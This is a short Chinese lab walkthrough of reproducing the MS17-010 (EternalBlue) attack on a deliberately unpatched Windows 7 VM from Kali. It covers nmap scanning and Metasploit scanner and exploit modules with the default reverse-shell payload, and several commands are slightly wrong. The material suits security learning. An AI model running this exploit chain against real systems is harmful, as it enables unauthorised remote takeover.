渗透流程

环境准备

使用vm
靶机 windows7 2019.1 sp1 ==192.168.123.146==
攻击机 kali 2023 amd64 ==192.168.123.236==
win7 关闭所有防火墙,删除所有补丁,保证未处于公共网络

image|500
image|500

Nmap 扫描靶机## MSF ms17-010复现

正文内容

namp 192.168.123.236

image|500

发现445端口,smb服务开启,判断可能有永恒之蓝(ms17-010)漏洞

MSF攻击

进入MSF,并且查找ms17-010相关脚本

msfconsole

image|500

image|500

search ms17-010

image|500

探测是否容易受到ms17-010攻击

use 3
show options

image|500

填入靶机ip
set RPORT 192.168.123.236

image|500

开始探测
run

image|500

扫描结果显示容易受到攻击,判断存在漏洞

正式攻击

回到脚本选择界面

image|500

image|500

use 0
show options
这里同样只需要设置RHOST靶机ip
payload选择默认的反弹shell即可

image|500

run

image|500

连接建立,shell反弹成功

image|500

截图
screenshot

image|500

image|500

image|500